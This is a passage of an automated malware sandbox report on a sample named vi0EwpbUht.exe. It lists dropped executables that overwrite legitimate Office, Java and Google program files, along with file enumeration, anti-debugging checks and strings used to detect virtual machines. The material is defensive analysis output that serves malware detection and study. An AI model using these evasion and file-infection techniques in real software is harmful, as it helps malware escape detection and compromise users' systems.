          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exeJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeDropped PE file which has not been started: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXEJump to dropped file
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe TID: 4404Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXELast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_00405080 FindFirstFileA,FindNextFileA,FindClose,1_2_00405080
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_00405634 FindFirstFileA,FindNextFileA,FindClose,1_2_00405634
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_00404F6C FindFirstFileA,FindClose,1_2_00404F6C
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040F0C4 FindFirstFileA,FindNextFileA,FindClose,1_2_0040F0C4
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040F0CC FindFirstFileA,FindNextFileA,FindClose,1_2_0040F0CC
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040F13F FindFirstFileA,FindNextFileA,FindClose,1_2_0040F13F
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_004056A7 FindFirstFileA,FindNextFileA,FindClose,1_2_004056A7
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040EA04 FindFirstFileA,FindClose,1_2_0040EA04
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040EB16 FindFirstFileA,FindClose,1_2_0040EB16
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040EB18 FindFirstFileA,FindNextFileA,FindClose,1_2_0040EB18
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 2_2_00405302 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,2_2_00405302
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 2_2_00405CD8 FindFirstFileA,FindClose,2_2_00405CD8
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 2_2_0040263E FindFirstFileA,2_2_0040263E
          Source: C:\Windows\svchost.comCode function: 5_2_00405634 FindFirstFileA,FindNextFileA,FindClose,5_2_00405634
          Source: C:\Windows\svchost.comCode function: 5_2_00404F6C FindFirstFileA,FindClose,5_2_00404F6C
          Source: C:\Windows\svchost.comCode function: 5_2_0040F0C4 FindFirstFileA,FindNextFileA,FindClose,5_2_0040F0C4
          Source: C:\Windows\svchost.comCode function: 5_2_0040F0CC FindFirstFileA,FindNextFileA,FindClose,5_2_0040F0CC
          Source: C:\Windows\svchost.comCode function: 5_2_00405080 FindFirstFileA,FindNextFileA,FindClose,5_2_00405080
          Source: C:\Windows\svchost.comCode function: 5_2_0040F13F FindFirstFileA,FindNextFileA,FindClose,5_2_0040F13F
          Source: C:\Windows\svchost.comCode function: 5_2_004056A7 FindFirstFileA,FindNextFileA,FindClose,5_2_004056A7
          Source: C:\Windows\svchost.comCode function: 5_2_0040EA04 FindFirstFileA,FindClose,5_2_0040EA04
          Source: C:\Windows\svchost.comCode function: 5_2_0040EB16 FindFirstFileA,FindClose,5_2_0040EB16
          Source: C:\Windows\svchost.comCode function: 5_2_0040EB18 FindFirstFileA,FindNextFileA,FindClose,5_2_0040EB18
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_00406D40 GetLogicalDriveStringsA,GetDriveTypeA,1_2_00406D40
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeThread delayed: delay time: 30000Jump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile opened: C:\Documents and Settings\All Users\Jump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile opened: C:\Documents and Settings\All Users\Application Data\Jump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\S\11357\Jump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Jump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Jump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Jump to behavior
          Source: explorer.exe, 00000004.00000000.442375787.00000000083E9000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000004.00000000.360481969.00000000063F6000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.414458333.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000004.00000000.442375787.00000000083E9000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000004.00000000.360481969.00000000063F6000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.368886619.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000004.00000000.414458333.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000000.414458333.0000000005D50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000004.00000000.368886619.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000004.00000000.337120885.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: explorer.exe, 00000004.00000000.414458333.0000000005D50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00409A80 rdtsc 3_2_00409A80
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_0040ACC0 LdrLoadDll,3_2_0040ACC0
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 2_2_00405CFF GetModuleHandleA,LoadLibraryA,GetProcAddress,2_2_00405CFF
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A090AF mov eax, dword ptr fs:[00000030h]3_2_00A090AF
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C9080 mov eax, dword ptr fs:[00000030h]3_2_009C9080
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FF0BF mov ecx, dword ptr fs:[00000030h]3_2_009FF0BF
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FF0BF mov eax, dword ptr fs:[00000030h]3_2_009FF0BF
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FF0BF mov eax, dword ptr fs:[00000030h]3_2_009FF0BF
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A43884 mov eax, dword ptr fs:[00000030h]3_2_00A43884
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A43884 mov eax, dword ptr fs:[00000030h]3_2_00A43884
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F20A0 mov eax, dword ptr fs:[00000030h]3_2_009F20A0
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F20A0 mov eax, dword ptr fs:[00000030h]3_2_009F20A0
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F20A0 mov eax, dword ptr fs:[00000030h]3_2_009F20A0
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F20A0 mov eax, dword ptr fs:[00000030h]3_2_009F20A0
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F20A0 mov eax, dword ptr fs:[00000030h]3_2_009F20A0
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F20A0 mov eax, dword ptr fs:[00000030h]3_2_009F20A0
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C58EC mov eax, dword ptr fs:[00000030h]3_2_009C58EC
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A5B8D0 mov eax, dword ptr fs:[00000030h]3_2_00A5B8D0
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A5B8D0 mov ecx, dword ptr fs:[00000030h]3_2_00A5B8D0
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A5B8D0 mov eax, dword ptr fs:[00000030h]3_2_00A5B8D0
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A5B8D0 mov eax, dword ptr fs:[00000030h]3_2_00A5B8D0
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A5B8D0 mov eax, dword ptr fs:[00000030h]3_2_00A5B8D0
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A5B8D0 mov eax, dword ptr fs:[00000030h]3_2_00A5B8D0
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB8E4 mov eax, dword ptr fs:[00000030h]3_2_009EB8E4
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB8E4 mov eax, dword ptr fs:[00000030h]3_2_009EB8E4
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C40E1 mov eax, dword ptr fs:[00000030h]3_2_009C40E1
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C40E1 mov eax, dword ptr fs:[00000030h]3_2_009C40E1
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C40E1 mov eax, dword ptr fs:[00000030h]3_2_009C40E1
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA830 mov eax, dword ptr fs:[00000030h]3_2_009EA830
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA830 mov eax, dword ptr fs:[00000030h]3_2_009EA830
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA830 mov eax, dword ptr fs:[00000030h]3_2_009EA830
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA830 mov eax, dword ptr fs:[00000030h]3_2_009EA830
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A47016 mov eax, dword ptr fs:[00000030h]3_2_00A47016
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A47016 mov eax, dword ptr fs:[00000030h]3_2_00A47016
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A47016 mov eax, dword ptr fs:[00000030h]3_2_00A47016
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F002D mov eax, dword ptr fs:[00000030h]3_2_009F002D
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F002D mov eax, dword ptr fs:[00000030h]3_2_009F002D
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F002D mov eax, dword ptr fs:[00000030h]3_2_009F002D
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F002D mov eax, dword ptr fs:[00000030h]3_2_009F002D
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F002D mov eax, dword ptr fs:[00000030h]3_2_009F002D
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009DB02A mov eax, dword ptr fs:[00000030h]3_2_009DB02A
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009DB02A mov eax, dword ptr fs:[00000030h]3_2_009DB02A
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009DB02A mov eax, dword ptr fs:[00000030h]3_2_009DB02A
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009DB02A mov eax, dword ptr fs:[00000030h]3_2_009DB02A
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A94015 mov eax, dword ptr fs:[00000030h]3_2_00A94015
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A94015 mov eax, dword ptr fs:[00000030h]3_2_00A94015
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E0050 mov eax, dword ptr fs:[00000030h]3_2_009E0050
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E0050 mov eax, dword ptr fs:[00000030h]3_2_009E0050
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A82073 mov eax, dword ptr fs:[00000030h]3_2_00A82073
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A91074 mov eax, dword ptr fs:[00000030h]3_2_00A91074
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A469A6 mov eax, dword ptr fs:[00000030h]3_2_00A469A6
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A849A4 mov eax, dword ptr fs:[00000030h]3_2_00A849A4
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A849A4 mov eax, dword ptr fs:[00000030h]3_2_00A849A4
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A849A4 mov eax, dword ptr fs:[00000030h]3_2_00A849A4
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A849A4 mov eax, dword ptr fs:[00000030h]3_2_00A849A4
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F2990 mov eax, dword ptr fs:[00000030h]3_2_009F2990
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FA185 mov eax, dword ptr fs:[00000030h]3_2_009FA185
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A451BE mov eax, dword ptr fs:[00000030h]3_2_00A451BE
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A451BE mov eax, dword ptr fs:[00000030h]3_2_00A451BE
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A451BE mov eax, dword ptr fs:[00000030h]3_2_00A451BE
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A451BE mov eax, dword ptr fs:[00000030h]3_2_00A451BE
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EC182 mov eax, dword ptr fs:[00000030h]3_2_009EC182
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E99BF mov ecx, dword ptr fs:[00000030h]3_2_009E99BF
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E99BF mov ecx, dword ptr fs:[00000030h]3_2_009E99BF
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E99BF mov eax, dword ptr fs:[00000030h]3_2_009E99BF
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E99BF mov ecx, dword ptr fs:[00000030h]3_2_009E99BF
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E99BF mov ecx, dword ptr fs:[00000030h]3_2_009E99BF
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E99BF mov eax, dword ptr fs:[00000030h]3_2_009E99BF
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E99BF mov ecx, dword ptr fs:[00000030h]3_2_009E99BF
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E99BF mov ecx, dword ptr fs:[00000030h]3_2_009E99BF
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E99BF mov eax, dword ptr fs:[00000030h]3_2_009E99BF
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E99BF mov ecx, dword ptr fs:[00000030h]3_2_009E99BF
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E99BF mov ecx, dword ptr fs:[00000030h]3_2_009E99BF
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E99BF mov eax, dword ptr fs:[00000030h]3_2_009E99BF
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F61A0 mov eax, dword ptr fs:[00000030h]3_2_009F61A0
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F61A0 mov eax, dword ptr fs:[00000030h]3_2_009F61A0
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A541E8 mov eax, dword ptr fs:[00000030h]3_2_00A541E8
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009CB1E1 mov eax, dword ptr fs:[00000030h]3_2_009CB1E1
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009CB1E1 mov eax, dword ptr fs:[00000030h]3_2_009CB1E1
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009CB1E1 mov eax, dword ptr fs:[00000030h]3_2_009CB1E1
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C9100 mov eax, dword ptr fs:[00000030h]3_2_009C9100
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C9100 mov eax, dword ptr fs:[00000030h]3_2_009C9100
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C9100 mov eax, dword ptr fs:[00000030h]3_2_009C9100
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F513A mov eax, dword ptr fs:[00000030h]3_2_009F513A
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F513A mov eax, dword ptr fs:[00000030h]3_2_009F513A
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E4120 mov eax, dword ptr fs:[00000030h]3_2_009E4120
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E4120 mov eax, dword ptr fs:[00000030h]3_2_009E4120
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E4120 mov eax, dword ptr fs:[00000030h]3_2_009E4120
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E4120 mov eax, dword ptr fs:[00000030h]3_2_009E4120
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E4120 mov ecx, dword ptr fs:[00000030h]3_2_009E4120
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB944 mov eax, dword ptr fs:[00000030h]3_2_009EB944
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB944 mov eax, dword ptr fs:[00000030h]3_2_009EB944
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009CB171 mov eax, dword ptr fs:[00000030h]3_2_009CB171
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009CB171 mov eax, dword ptr fs:[00000030h]3_2_009CB171
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009CC962 mov eax, dword ptr fs:[00000030h]3_2_009CC962
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FD294 mov eax, dword ptr fs:[00000030h]3_2_009FD294
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FD294 mov eax, dword ptr fs:[00000030h]3_2_009FD294
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009DAAB0 mov eax, dword ptr fs:[00000030h]3_2_009DAAB0
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009DAAB0 mov eax, dword ptr fs:[00000030h]3_2_009DAAB0
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FFAB0 mov eax, dword ptr fs:[00000030h]3_2_009FFAB0
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C52A5 mov eax, dword ptr fs:[00000030h]3_2_009C52A5
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C52A5 mov eax, dword ptr fs:[00000030h]3_2_009C52A5
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C52A5 mov eax, dword ptr fs:[00000030h]3_2_009C52A5
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C52A5 mov eax, dword ptr fs:[00000030h]3_2_009C52A5
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C52A5 mov eax, dword ptr fs:[00000030h]3_2_009C52A5
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84AEF mov eax, dword ptr fs:[00000030h]3_2_00A84AEF
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84AEF mov eax, dword ptr fs:[00000030h]3_2_00A84AEF
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84AEF mov eax, dword ptr fs:[00000030h]3_2_00A84AEF
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84AEF mov eax, dword ptr fs:[00000030h]3_2_00A84AEF
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84AEF mov eax, dword ptr fs:[00000030h]3_2_00A84AEF
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84AEF mov eax, dword ptr fs:[00000030h]3_2_00A84AEF
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84AEF mov eax, dword ptr fs:[00000030h]3_2_00A84AEF
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84AEF mov eax, dword ptr fs:[00000030h]3_2_00A84AEF
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84AEF mov eax, dword ptr fs:[00000030h]3_2_00A84AEF
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84AEF mov eax, dword ptr fs:[00000030h]3_2_00A84AEF
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84AEF mov eax, dword ptr fs:[00000030h]3_2_00A84AEF
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84AEF mov eax, dword ptr fs:[00000030h]3_2_00A84AEF
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84AEF mov eax, dword ptr fs:[00000030h]3_2_00A84AEF
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84AEF mov eax, dword ptr fs:[00000030h]3_2_00A84AEF
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F2ACB mov eax, dword ptr fs:[00000030h]3_2_009F2ACB
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F2AE4 mov eax, dword ptr fs:[00000030h]3_2_009F2AE4
